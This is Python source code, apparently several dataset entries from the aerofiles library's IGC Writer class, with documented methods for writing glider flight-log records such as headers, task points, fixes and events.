    if flight_date is None:
        flight_date = '000000'
    else:
        flight_date = self.format_date(flight_date)

    if task_number is None:
        task_number = 1
    elif not isinstance(task_number, int):
        raise ValueError('Invalid task number: %s' % task_number)

    if not isinstance(turnpoints, int):
        raise ValueError('Invalid turnpoints: %s' % turnpoints)

    record = '{0}{1}{2:04d}{3:02d}'.format(
        declaration_datetime,
        flight_date,
        task_number,
        turnpoints,
    )

    if text:
        record += text

    self.write_record('C', record)
def write_task_point(self, latitude=None, longitude=None, text='',
                     distance_min=None, distance_max=None,
                     bearing1=None, bearing2=None):
    """Write a task declaration point::

        writer.write_task_point(
            latitude=(51 + 7.345 / 60.),
            longitude=(6 + 24.765 / 60.),
            text='Meiersberg',
        )
        # -> C5107345N00624765EMeiersberg

    If no ``latitude`` or ``longitude`` is passed, the fields will be
    filled with zeros (i.e. unknown coordinates). This however should
    only be used for ``TAKEOFF`` and ``LANDING`` points.

    For area tasks the relevant sector can be specified with
    ``distance_min``/``distance_max`` (km) and ``bearing1``/``bearing2``
    (degrees); all four must be given together::

        writer.write_task_point(
            -(12 + 32.112 / 60.),
            -(178 + .001 / 60.),
            'TURN AREA',
            distance_min=12.0,
            distance_max=32.0,
            bearing1=122.0,
            bearing2=182.0,
        )
        # -> C1232112S17800001W00120000032000122000182000TURN AREA

    :param latitude: latitude of the point (between -90 and 90 degrees)
    :param longitude: longitude of the point (between -180 and 180
        degrees)
    :param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
        ``START``, ``TURN 1``, ``TURN 2``, ``FINISH`` or ``LANDING``)
    """
    parts = [self.format_latitude(latitude),
             self.format_longitude(longitude)]

    if None not in [distance_min, distance_max, bearing1, bearing2]:
        # Each value is encoded as zero-padded whole part plus three
        # digits of thousandths.
        # NOTE(review): int() truncates the fractional part, so float
        # representation error can shave one unit off the thousandths.
        for width, value in ((4, distance_min), (4, distance_max),
                             (3, bearing1), (3, bearing2)):
            whole = int(value)
            parts.append('%0*d' % (width, whole))
            parts.append('%03d' % int((value - whole) * 1000))

    if text:
        parts.append(text)

    self.write_record('C', ''.join(parts))
def write_task_points(self, points):
    """Write multiple task declaration points with one call::

        writer.write_task_points([
            (None, None, 'TAKEOFF'),
            (51.40375, 6.41275, 'START'),
            (50.38210, 8.82105, 'TURN 1'),
            (50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
            (51.40375, 6.41275, 'FINISH'),
            (None, None, 'LANDING'),
        ])

    See :meth:`~aerofiles.igc.Writer.write_task_point` for the record
    layout of each entry.

    :param points: a list of ``(latitude, longitude, text)`` tuples. use
        ``(latitude, longitude, text, distance_min, distance_max,
        bearing1, bearing2)`` tuples for area task points.
    """
    for point in points:
        # Only the plain (3) and area (7) tuple shapes are valid.
        if len(point) not in (3, 7):
            raise ValueError('Invalid number of task point tuple items')
        self.write_task_point(*point)
def write_security(self, security, bytes_per_line=75):
    """Write the security signature::

        writer.write_security('ABCDEF')
        # -> GABCDEF

    Signatures longer than ``bytes_per_line`` are split across multiple
    G records, as required by the IGC file specification.

    :param security: the security signature
    :param bytes_per_line: the maximum number of bytes per line
        (default: ``75``)
    """
    chunks = [security[i:i + bytes_per_line]
              for i in range(0, len(security), bytes_per_line)]
    for chunk in chunks:
        self.write_record('G', chunk)
def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
              pressure_alt=None, gps_alt=None, extensions=None):
    """Write a B (fix) record::

        writer.write_fix(
            datetime.time(12, 34, 56),
            latitude=51.40375,
            longitude=6.41275,
            valid=True,
            pressure_alt=1234,
            gps_alt=1432,
        )
        # -> B1234565124225N00624765EA0123401432

    :param time: UTC time of the fix record (default:
        :meth:`~datetime.datetime.utcnow`)
    :param latitude: latitude of the last GPS fix
    :param longitude: longitude of the last GPS fix
    :param valid: ``True`` if the current GPS fix is 3D
    :param pressure_alt: altitude to the ICAO ISA above the 1013.25 hPa
        sea level datum
    :param gps_alt: altitude above the WGS84 ellipsoid
    :param extensions: a list of extension values according to previous
        declaration through
        :meth:`~aerofiles.igc.Writer.write_fix_extensions`
    """
    if time is None:
        time = datetime.datetime.utcnow()

    parts = [
        self.format_time(time),
        self.format_latitude(latitude),
        self.format_longitude(longitude),
        'A' if valid else 'V',          # fix validity flag
        '%05d' % (pressure_alt or 0),
        '%05d' % (gps_alt or 0),
    ]

    if self.fix_extensions or extensions:
        # Values must match the earlier I record declaration one-to-one.
        if not (isinstance(extensions, list) and
                isinstance(self.fix_extensions, list)):
            raise ValueError('Invalid extensions list')

        if len(extensions) != len(self.fix_extensions):
            raise ValueError(
                'Number of extensions does not match declaration')

        for spec, value in zip(self.fix_extensions, extensions):
            width = spec[1]
            # Numbers are zero-padded to the declared field width.
            if isinstance(value, (int, float)):
                value = ('%0' + str(width) + 'd') % value
            if len(value) != width:
                raise ValueError('Extension value has wrong length')
            parts.append(value)

    self.write_record('B', ''.join(parts))
def write_event(self, *args):
    """
    Write an event record::

        writer.write_event(datetime.time(12, 34, 56), 'PEV')
        # -> E123456PEV

        writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
        # -> E123456PEVSome Text

        writer.write_event('PEV')  # uses utcnow()
        # -> E121503PEV

    (Fixed: the examples previously showed ``B…`` output although this
    method writes ``E`` records.)

    :param time: UTC time of the event record (default:
        :meth:`~datetime.datetime.utcnow`)
    :param code: event type as three-letter-code
    :param text: additional text describing the event (optional)
    """
    # Emulate the (time?, code, text?) overloads by hand, since the
    # optional "time" parameter comes first.
    num_args = len(args)
    if not (1 <= num_args <= 3):
        raise ValueError('Invalid number of parameters received')

    if num_args == 3:
        time, code, text = args
    elif num_args == 1:
        code = args[0]
        time = text = None
    elif isinstance(args[0], (datetime.time, datetime.datetime)):
        # Two arguments starting with a time -> (time, code)
        time, code = args
        text = None
    else:
        # Two arguments without a leading time -> (code, text)
        code, text = args
        time = None

    if time is None:
        time = datetime.datetime.utcnow()

    if not patterns.THREE_LETTER_CODE.match(code):
        raise ValueError('Invalid event code')

    record = self.format_time(time)
    record += code
    if text:
        record += text

    self.write_record('E', record)
def write_satellites(self, *args):
    """Write a satellite constellation (F) record::

        writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
        # -> F12345601020522

    :param time: UTC time of the satellite constellation record
        (default: :meth:`~datetime.datetime.utcnow`)
    :param satellites: a list of satellite IDs as either two-character
        strings or integers below 100
    """
    # Accept either (satellites) or (time, satellites).
    if len(args) == 1:
        time, satellites = None, args[0]
    elif len(args) == 2:
        time, satellites = args
    else:
        raise ValueError('Invalid number of parameters received')

    if time is None:
        time = datetime.datetime.utcnow()

    record = self.format_time(time)
    for satellite in satellites:
        sat_id = ('%02d' % satellite) if isinstance(satellite, int) \
            else satellite
        if len(sat_id) != 2:
            raise ValueError('Invalid satellite ID')
        record += sat_id

    self.write_record('F', record)
def write_comment(self, code, text):
    """
    Write a comment (L) record::

        writer.write_comment('PLT', 'Arrived at the first turnpoint')
        # -> LPLTArrived at the first turnpoint

    :param code: a three-letter-code describing the source of the comment
        (e.g. ``PLT`` for pilot)
    :param text: the text that should be added to the comment
    :raises ValueError: if *code* is not a valid three-letter code
    """
    if not patterns.THREE_LETTER_CODE.match(code):
        raise ValueError('Invalid source')
    self.write_record('L', code + text)
|
Turbo87/aerofiles | aerofiles/igc/writer.py | Writer.write_comment | python | def write_comment(self, code, text):
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid source')
self.write_record('L', code + text) | Write a comment record::
writer.write_comment('PLT', 'Arrived at the first turnpoint')
# -> LPLTArrived at the first turnpoint
:param code: a three-letter-code describing the source of the comment
(e.g. ``PLT`` for pilot)
:param text: the text that should be added to the comment | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/writer.py#L864-L879 | [
"def write_record(self, type, record):\n self.write_line(type + record)\n"
class Writer:
    """
    A writer for the IGC flight log file format.

    Records are emitted through the individual ``write_*`` methods; each
    line is ASCII-encoded with a CRLF terminator (see ``write_line``), so
    the target file object should be opened in binary mode.
    """

    # Header keys that write_headers() refuses to run without.
    REQUIRED_HEADERS = [
        'manufacturer_code',
        'logger_id',
        'date',
        'logger_type',
        'gps_receiver',
    ]
def __init__(self, fp=None):
    """Create a writer that emits IGC records to *fp* (binary file-like)."""
    self.fp = fp
    # Extension declarations; populated by write_fix_extensions() /
    # write_k_record_extensions() and consulted when writing fix records.
    self.fix_extensions = None
    self.k_record_extensions = None
def format_date(self, date):
    """Normalize *date* to the IGC ``DDMMYY`` string form.

    Accepts a :class:`datetime.datetime`, a :class:`datetime.date` or an
    already-formatted string; raises :class:`ValueError` when the result
    does not match the expected pattern.
    """
    if isinstance(date, datetime.datetime):
        date = date.date()

    if isinstance(date, datetime.date):
        date = date.strftime('%d%m%y')

    if not patterns.DATE.match(date):
        raise ValueError("Invalid date: " + date)

    return date
def format_time(self, time):
    """Normalize *time* to the IGC ``HHMMSS`` string form.

    Accepts a :class:`datetime.datetime`, a :class:`datetime.time` or an
    already-formatted string; raises :class:`ValueError` when the result
    does not match the expected pattern.
    """
    if isinstance(time, datetime.datetime):
        time = time.time()

    if isinstance(time, datetime.time):
        time = time.strftime('%H%M%S')

    if not patterns.TIME.match(time):
        raise ValueError("Invalid time: " + time)

    return time
def format_coordinate(self, value, default=None, is_latitude=True):
    """Format a decimal-degree coordinate as ``DDMMmmm[NS]`` /
    ``DDDMMmmm[EW]``.

    Minutes are expressed as five digits of milli-minutes. ``None``
    values yield *default*.

    :param value: coordinate in decimal degrees, or ``None``
    :param default: string returned when *value* is ``None``
    :param is_latitude: selects the N/S two-digit-degree form instead of
        the E/W three-digit-degree form
    :raises ValueError: if the coordinate is out of range
    """
    if value is None:
        return default

    if is_latitude:
        if not -90 <= value <= 90:
            raise ValueError('Invalid latitude: %s' % value)
        hemisphere = 'S' if value < 0 else 'N'
        template = '%02d%05d%s'
    else:
        if not -180 <= value <= 180:
            raise ValueError('Invalid longitude: %s' % value)
        hemisphere = 'W' if value < 0 else 'E'
        template = '%03d%05d%s'

    magnitude = abs(value)
    whole_degrees = int(magnitude)
    milliminutes = round((magnitude - whole_degrees) * 60000)
    return template % (whole_degrees, milliminutes, hemisphere)
def format_latitude(self, value):
    """Format a latitude in decimal degrees; ``None`` -> ``'0000000N'``."""
    return self.format_coordinate(value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
    """Format a longitude in decimal degrees; ``None`` -> ``'00000000E'``."""
    return self.format_coordinate(value, default='00000000E', is_latitude=False)
def write_line(self, line):
    """Encode *line* to ASCII (unmappable characters replaced with ``?``)
    and write it to the output stream with a CRLF terminator."""
    encoded = (line + u'\r\n').encode('ascii', 'replace')
    self.fp.write(encoded)
def write_record(self, type, record):
    """Write one IGC record: single-letter *type* prefix plus payload."""
    self.write_line(type + record)
def write_logger_id(self, manufacturer, logger_id, extension=None,
                    validate=True):
    """Write the manufacturer and logger id header line::

        writer.write_logger_id('XXX', 'ABC', extension='FLIGHT:1')
        # -> AXXXABCFLIGHT:1

    Some older loggers have decimal logger ids which can be written like
    this::

        writer.write_logger_id('FIL', '13961', validate=False)
        # -> AFIL13961

    :param manufacturer: the three-letter-code of the manufacturer
    :param logger_id: the logger id as three-letter-code
    :param extension: anything else that should be appended to this
        header (e.g. ``FLIGHT:1``)
    :param validate: whether to validate the manufacturer and logger_id
        three-letter-codes
    """
    if validate:
        if not patterns.MANUFACTURER_CODE.match(manufacturer):
            raise ValueError('Invalid manufacturer code')
        if not patterns.LOGGER_ID.match(logger_id):
            raise ValueError('Invalid logger id')

    body = '%s%s' % (manufacturer, logger_id)
    if extension:
        body += extension

    self.write_record('A', body)
def write_header(self, source, subtype, value,
                 subtype_long=None, value_long=None):
    """Write an H (header) record.

    *source* must be ``'F'`` (flight recorder) or ``'O'`` (observer).
    The record layout depends on which of the long-form fields are
    supplied: none, ``subtype_long`` only, or both.

    :raises ValueError: for an unknown *source* letter
    """
    if source not in ('F', 'O'):
        raise ValueError('Invalid source: %s' % source)

    if not subtype_long:
        body = '%s%s%s' % (source, subtype, value)
    elif not value_long:
        body = '%s%s%s:%s' % (source, subtype, subtype_long, value)
    else:
        body = '%s%s%s%s:%s' % (
            source, subtype, value, subtype_long, value_long)

    self.write_record('H', body)
def write_fr_header(self, subtype, value,
                    subtype_long=None, value_long=None):
    """Write a flight-recorder sourced (``HF``) header record."""
    self.write_header('F', subtype, value,
                      subtype_long=subtype_long, value_long=value_long)
def write_date(self, date):
    """
    Write the date header::

        writer.write_date(datetime.date(2014, 5, 2))
        # -> HFDTE020514

    (Fixed: the example previously showed ``HFDTE140502``, but
    ``format_date`` emits the ``DDMMYY`` form, so 2014-05-02 becomes
    ``020514``.)

    :param date: a :class:`datetime.date` instance
    """
    self.write_fr_header('DTE', self.format_date(date))
def write_fix_accuracy(self, accuracy=None):
    """Write the ``HFFXA`` estimated fix accuracy header::

        writer.write_fix_accuracy()
        # -> HFFXA500

        writer.write_fix_accuracy(25)
        # -> HFFXA025

    :param accuracy: the estimated GPS fix accuracy in meters,
        ``1``-``999`` (defaults to ``500``)
    :raises ValueError: if the value is outside the representable range
    """
    value = 500 if accuracy is None else int(accuracy)
    if not 0 < value < 1000:
        raise ValueError('Invalid fix accuracy')
    self.write_fr_header('FXA', '%03d' % value)
def write_pilot(self, pilot):
    """Emit the ``HFPLTPILOTINCHARGE`` header record.

    :param pilot: name of the pilot in charge
    """
    self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')
def write_copilot(self, copilot):
    """Emit the ``HFCM2CREW2`` header record.

    :param copilot: name of the copilot
    """
    self.write_fr_header('CM2', copilot, subtype_long='CREW2')
def write_glider_type(self, glider_type):
    """Emit the ``HFGTYGLIDERTYPE`` header record.

    :param glider_type: the glider type (e.g. ``Hornet``)
    """
    self.write_fr_header('GTY', glider_type, subtype_long='GLIDERTYPE')
def write_glider_id(self, glider_id):
    """Emit the ``HFGIDGLIDERID`` header record.

    The glider id is usually the official registration number of the
    airplane, e.g. ``D-4449`` or ``N116EL``.

    :param glider_id: the glider registration number
    """
    self.write_fr_header('GID', glider_id, subtype_long='GLIDERID')
def write_gps_datum(self, code=None, gps_datum=None):
"""
Write the mandatory GPS datum header::
writer.write_gps_datum()
# -> HFDTM100GPSDATUM:WGS-1984
writer.write_gps_datum(33, 'Guam-1963')
# -> HFDTM033GPSDATUM:Guam-1963
Note that the default GPS datum is WGS-1984 and you should use that
unless you have very good reasons against it.
:param code: the GPS datum code as defined in the IGC file
specification, section A8
:param gps_datum: the GPS datum in written form
"""
if code is None:
code = 100
if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
)
def write_firmware_version(self, firmware_version):
"""
Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
"""
Write the pressure sensor header::
writer.write_pressure_sensor('Intersema MS5534B,8191')
# -> HFPRSPRESSALTSENSOR:Intersema MS5534B,8191
:param pressure_sensor: the pressure sensor information
"""
self.write_fr_header(
'PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
"""
Write the optional competition id declaration header::
writer.write_competition_id('TH')
# -> HFCIDCOMPETITIONID:TH
:param competition_id: competition id of the glider
"""
self.write_fr_header(
'CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
"""
Write the optional competition class declaration header::
writer.write_competition_class('Club')
# -> HFCCLCOMPETITIONCLASS:Club
:param competition_class: competition class of the glider
"""
self.write_fr_header(
'CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
"""
Write the optional club declaration header::
writer.write_club('LV Aachen')
# -> HFCLBCLUB:LV Aachen
:param club: club or organisation for which this flight should be
scored
"""
self.write_fr_header('CLB', club, subtype_long='CLUB')
def write_headers(self, headers):
"""
Write all the necessary headers in the correct order::
writer.write_headers({
'manufacturer_code': 'XCS',
'logger_id': 'TBX',
'date': datetime.date(1987, 2, 24),
'fix_accuracy': 50,
'pilot': 'Tobias Bieniek',
'copilot': 'John Doe',
'glider_type': 'Duo Discus',
'glider_id': 'D-KKHH',
'firmware_version': '2.2',
'hardware_version': '2',
'logger_type': 'LXNAVIGATION,LX8000F',
'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
'competition_id': '2H',
'competition_class': 'Doubleseater',
})
# -> AXCSTBX
# -> HFDTE870224
# -> HFFXA050
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
# -> HFCM2CREW2:John Doe
# -> HFGTYGLIDERTYPE:Duo Discus
# -> HFGIDGLIDERID:D-KKHH
# -> HFDTM100GPSDATUM:WGS-1984
# -> HFRFWFIRMWAREVERSION:2.2
# -> HFRHWHARDWAREVERSION:2
# -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
# -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
# -> HFCIDCOMPETITIONID:2H
# -> HFCCLCOMPETITIONCLASS:Doubleseater
This method will throw a :class:`ValueError` if a mandatory header is
missing and will fill others up with empty strings if no value was
given. The optional headers are only written if they are part of the
specified :class:`dict`.
.. admonition:: Note
The use of this method is encouraged compared to calling all the
other header-writing methods manually!
:param headers: a :class:`dict` of all the headers that should be
written.
"""
for header in self.REQUIRED_HEADERS:
if header not in headers:
raise ValueError('%s header missing' % header)
self.write_logger_id(
headers['manufacturer_code'],
headers['logger_id'],
extension=headers.get('logger_id_extension')
)
self.write_date(headers['date'])
self.write_fix_accuracy(headers.get('fix_accuracy'))
self.write_pilot(headers.get('pilot', ''))
if 'copilot' in headers:
self.write_copilot(headers['copilot'])
self.write_glider_type(headers.get('glider_type', ''))
self.write_glider_id(headers.get('glider_id', ''))
self.write_gps_datum(
code=headers.get('gps_datum_code'),
gps_datum=headers.get('gps_datum'),
)
self.write_firmware_version(headers.get('firmware_version', ''))
self.write_hardware_version(headers.get('hardware_version', ''))
self.write_logger_type(headers['logger_type'])
self.write_gps_receiver(headers['gps_receiver'])
self.write_pressure_sensor(headers.get('pressure_sensor', ''))
if 'competition_id' in headers:
self.write_competition_id(headers['competition_id'])
if 'competition_class' in headers:
self.write_competition_class(headers['competition_class'])
if 'club' in headers:
self.write_club(headers['club'])
def write_extensions(self, type, start_byte, extensions):
num_extensions = len(extensions)
if num_extensions >= 100:
raise ValueError('Too many extensions')
record = '%02d' % num_extensions
for extension, length in extensions:
if not patterns.EXTENSION_CODE.match(extension):
raise ValueError('Invalid extension: %s' % extension)
end_byte = start_byte + length - 1
record += '%02d%02d%s' % (start_byte, end_byte, extension)
start_byte = start_byte + length
self.write_record(type, record)
def write_fix_extensions(self, extensions):
"""
Write the fix extensions description header::
writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
# -> I033638FXA3940SIU4143ENL
:param extensions: a list of ``(extension, length)`` tuples
"""
self.fix_extensions = extensions
self.write_extensions('I', 36, extensions)
def write_k_record_extensions(self, extensions):
"""
Write the K record extensions description header::
writer.write_k_record_extensions([('HDT', 5)])
# -> J010812HDT
Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
associated records.
:param extensions: a list of ``(extension, length)`` tuples
"""
self.k_record_extensions = extensions
self.write_extensions('J', 8, extensions)
def write_task_metadata(
self, declaration_datetime=None, flight_date=None,
task_number=None, turnpoints=None, text=None):
"""
Write the task declaration metadata record::
writer.write_task_metadata(
datetime.datetime(2014, 4, 13, 12, 53, 02),
task_number=42,
turnpoints=3,
)
# -> C140413125302000000004203
There are sensible defaults in place for all parameters except for the
``turnpoints`` parameter. If you don't pass that parameter the method
will raise a :class:`ValueError`. The other parameter defaults are
mentioned in the list below.
:param declaration_datetime: a :class:`datetime.datetime` instance of
the UTC date and time at the time of declaration (default: current
date and time)
:param flight_date: a :class:`datetime.date` instance of the intended
date of the flight (default: ``000000``, which means "use
declaration date")
:param task_number: task number for the flight date or an integer-based
identifier (default: ``0001``)
:param turnpoints: the number of turnpoints in the task (not counting
start and finish points!)
:param text: optional text to append to the metadata record
"""
if declaration_datetime is None:
declaration_datetime = datetime.datetime.utcnow()
if isinstance(declaration_datetime, datetime.datetime):
declaration_datetime = (
self.format_date(declaration_datetime) +
self.format_time(declaration_datetime)
)
elif not patterns.DATETIME.match(declaration_datetime):
raise ValueError('Invalid declaration datetime: %s' %
declaration_datetime)
if flight_date is None:
flight_date = '000000'
else:
flight_date = self.format_date(flight_date)
if task_number is None:
task_number = 1
elif not isinstance(task_number, int):
raise ValueError('Invalid task number: %s' % task_number)
if not isinstance(turnpoints, int):
raise ValueError('Invalid turnpoints: %s' % turnpoints)
record = '{0}{1}{2:04d}{3:02d}'.format(
declaration_datetime,
flight_date,
task_number,
turnpoints,
)
if text:
record += text
self.write_record('C', record)
def write_task_point(self, latitude=None, longitude=None, text='',
distance_min=None, distance_max=None,
bearing1=None, bearing2=None):
"""
Write a task declaration point::
writer.write_task_point(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> C5107345N00624765EMeiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for ``TAKEOFF`` and ``LANDING`` points.
For area tasks there are some additional parameters that can be used
to specify the relevant areas::
writer.write_task_point(
-(12 + 32.112 / 60.),
-(178 + .001 / 60.),
'TURN AREA',
distance_min=12.0,
distance_max=32.0,
bearing1=122.0,
bearing2=182.0,
)
# -> C1232112S17800001W00120000032000122000182000TURN AREA
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
``START``, ``TURN 1``, ``TURN 2``, ``FINISH`` or ``LANDING``)
"""
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
record = latitude + longitude
if None not in [distance_min, distance_max, bearing1, bearing2]:
record += '%04d' % int(distance_min)
record += '%03d' % int((distance_min - int(distance_min)) * 1000)
record += '%04d' % int(distance_max)
record += '%03d' % int((distance_max - int(distance_max)) * 1000)
record += '%03d' % int(bearing1)
record += '%03d' % int((bearing1 - int(bearing1)) * 1000)
record += '%03d' % int(bearing2)
record += '%03d' % int((bearing2 - int(bearing2)) * 1000)
if text:
record += text
self.write_record('C', record)
def write_task_points(self, points):
"""
Write multiple task declaration points with one call::
writer.write_task_points([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> C0000000N00000000ETAKEOFF
# -> C5124225N00624765ESTART
# -> C5022926N00849263ETURN 1
# -> C5035427N00702133E00000000032500000000180000TURN 2
# -> C5124225N00624765EFINISH
# -> C0000000N00000000ELANDING
see the :meth:`~aerofiles.igc.Writer.write_task_point` method for more
information.
:param points: a list of ``(latitude, longitude, text)`` tuples. use
``(latitude, longitude, text, distance_min, distance_max, bearing1,
bearing2)`` tuples for area task points.
"""
for args in points:
if len(args) not in [3, 7]:
raise ValueError('Invalid number of task point tuple items')
self.write_task_point(*args)
def write_security(self, security, bytes_per_line=75):
"""
Write the security signature::
writer.write_security('ABCDEF')
# -> GABCDEF
If a signature of more than 75 bytes is used the G record will be
broken into multiple lines according to the IGC file specification.
This rule can be configured with the ``bytes_per_line`` parameter if
necessary.
:param security: the security signature
:param bytes_per_line: the maximum number of bytes per line
(default: ``75``)
"""
for start in range(0, len(security), bytes_per_line):
self.write_record('G', security[start:start + bytes_per_line])
def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
              pressure_alt=None, gps_alt=None, extensions=None):
    """
    Write a fix record (B record)::

        writer.write_fix(
            datetime.time(12, 34, 56),
            latitude=51.40375,
            longitude=6.41275,
            valid=True,
            pressure_alt=1234,
            gps_alt=1432,
        )
        # -> B1234565124225N00624765EA0123401432

    :param time: UTC time of the fix record (default:
        :meth:`~datetime.datetime.utcnow`)
    :param latitude: latitude of the last GPS fix
    :param longitude: longitude of the last GPS fix
    :param valid: ``True`` if the current GPS fix is 3D
    :param pressure_alt: altitude to the ICAO ISA above the 1013.25 hPa
        sea level datum
    :param gps_alt: altitude above the WGS84 ellipsoid
    :param extensions: a list of extension values according to previous
        declaration through
        :meth:`~aerofiles.igc.Writer.write_fix_extensions`
    """
    if time is None:
        time = datetime.datetime.utcnow()

    # B record layout: time, latitude, longitude, validity flag,
    # pressure altitude, GPS altitude, then any declared extensions.
    record = self.format_time(time)
    record += self.format_latitude(latitude)
    record += self.format_longitude(longitude)
    record += 'A' if valid else 'V'  # 'A' = valid 3D fix, 'V' = invalid
    record += '%05d' % (pressure_alt or 0)  # ``None`` is written as 00000
    record += '%05d' % (gps_alt or 0)

    if self.fix_extensions or extensions:
        # Extension values must match the I record declaration exactly:
        # same count, each padded/formatted to the declared field width.
        if not (isinstance(extensions, list) and
                isinstance(self.fix_extensions, list)):
            raise ValueError('Invalid extensions list')

        if len(extensions) != len(self.fix_extensions):
            raise ValueError(
                'Number of extensions does not match declaration')

        for type_length, value in zip(self.fix_extensions, extensions):
            length = type_length[1]

            # Numeric values are zero-padded to the declared width.
            if isinstance(value, (int, float)):
                value = ('%0' + str(length) + 'd') % value

            if len(value) != length:
                raise ValueError('Extension value has wrong length')

            record += value

    self.write_record('B', record)
def write_event(self, *args):
    """
    Write an event record (E record)::

        writer.write_event(datetime.time(12, 34, 56), 'PEV')
        # -> E123456PEV

        writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
        # -> E123456PEVSome Text

        writer.write_event('PEV')  # uses utcnow()
        # -> E121503PEV

    :param time: UTC time of the fix record (default:
        :meth:`~datetime.datetime.utcnow`)
    :param code: event type as three-letter-code
    :param text: additional text describing the event (optional)
    """
    # Positional dispatch: accepts (time, code, text), (time, code),
    # (code, text) or (code,).
    num_args = len(args)
    if not (1 <= num_args <= 3):
        raise ValueError('Invalid number of parameters received')

    if num_args == 3:
        time, code, text = args
    elif num_args == 1:
        code = args[0]
        time = text = None
    elif isinstance(args[0], (datetime.time, datetime.datetime)):
        # two arguments, first one is a time -> (time, code)
        time, code = args
        text = None
    else:
        # two arguments, no time given -> (code, text)
        code, text = args
        time = None

    if time is None:
        time = datetime.datetime.utcnow()

    if not patterns.THREE_LETTER_CODE.match(code):
        raise ValueError('Invalid event code')

    record = self.format_time(time)
    record += code
    if text:
        record += text

    self.write_record('E', record)
def write_satellites(self, *args):
    """
    Write a satellite constellation record::

        writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
        # -> F12345601020522

    :param time: UTC time of the satellite constellation record (default:
        :meth:`~datetime.datetime.utcnow`)
    :param satellites: a list of satellite IDs as either two-character
        strings or integers below 100
    """
    # Positional dispatch: (satellites,) or (time, satellites).
    if len(args) == 1:
        time, satellites = None, args[0]
    elif len(args) == 2:
        time, satellites = args
    else:
        raise ValueError('Invalid number of parameters received')

    if time is None:
        time = datetime.datetime.utcnow()

    parts = [self.format_time(time)]
    for satellite in satellites:
        # Integers are zero-padded to the mandatory two characters.
        sat_id = '%02d' % satellite if isinstance(satellite, int) else satellite
        if len(sat_id) != 2:
            raise ValueError('Invalid satellite ID')
        parts.append(sat_id)

    self.write_record('F', ''.join(parts))
def write_k_record(self, *args):
    """
    Write a K record::

        writer.write_k_record_extensions([
            ('FXA', 3), ('SIU', 2), ('ENL', 3),
        ])

        writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])

        # -> J030810FXA1112SIU1315ENL
        # -> K02030402313002

    :param time: UTC time of the k record (default:
        :meth:`~datetime.datetime.utcnow`)
    :param extensions: a list of extension values according to previous
        declaration through
        :meth:`~aerofiles.igc.Writer.write_k_record_extensions`
    """
    # Positional dispatch: (extensions,) or (time, extensions).
    num_args = len(args)
    if num_args not in (1, 2):
        raise ValueError('Invalid number of parameters received')

    if num_args == 1:
        extensions = args[0]
        time = None
    else:
        time, extensions = args

    if time is None:
        time = datetime.datetime.utcnow()

    record = self.format_time(time)

    # The values must match the J record declaration exactly:
    # same count, each padded/formatted to the declared field width.
    if not (isinstance(extensions, list) and
            isinstance(self.k_record_extensions, list)):
        raise ValueError('Invalid extensions list')

    if len(extensions) != len(self.k_record_extensions):
        raise ValueError(
            'Number of extensions does not match declaration')

    for type_length, value in zip(self.k_record_extensions, extensions):
        length = type_length[1]

        # Numeric values are zero-padded to the declared width.
        if isinstance(value, (int, float)):
            value = ('%0' + str(length) + 'd') % value

        if len(value) != length:
            raise ValueError('Extension value has wrong length')

        record += value

    self.write_record('K', record)
|
